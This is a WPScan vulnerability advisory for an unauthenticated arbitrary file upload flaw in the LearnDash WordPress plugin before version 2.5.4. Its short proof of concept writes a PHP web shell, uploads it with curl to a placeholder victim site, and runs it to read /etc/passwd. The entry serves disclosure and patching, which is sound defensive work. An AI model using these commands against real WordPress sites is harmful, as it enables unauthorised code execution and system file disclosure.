WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

LearnDash < 2.5.4 - Unauthenticated Arbitrary File Upload

Description

The plugin does not have any authorisation and validation of the file to be uploaded in the learndash_assignment_process_init() function, which could allow unauthenticated users to upload arbitrary files to the web server

Proof of Concept

$ echo '<?php echo exec("ls -la /etc/passwd");' > shell.php.php

$ curl -F "post=foobar" -F "course_id=foobar" -F "uploadfile=foobar" -F 
"uploadfiles[][email protected]" https://victim.tld/

$ curl 'https://victim.tld/wp-content/uploads/assignments/shell.php.'
-rw-r--r-- 1 root root 2385 Apr 14  2017 /etc/passwd

Affects Plugins

sfwd-lms
Fixed in version 2.5.4

References

CVE
CVE-2018-25019
URL
https://lists.openwall.net/full-disclosure/2018/01/10/17

Classification

Type

UPLOAD

CWE
CWE-434

Miscellaneous

Original Researcher

Jerome Bruandet (NinTechNet)

Verified

Yes

WPVDB ID
9444f67b-8e3d-4cf0-b319-ed25e7db383a

Timeline

Publicly Published

2018-01-06 (about 4 years ago)

Added

2021-10-20 (about 6 months ago)

Last Updated

2022-04-14 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin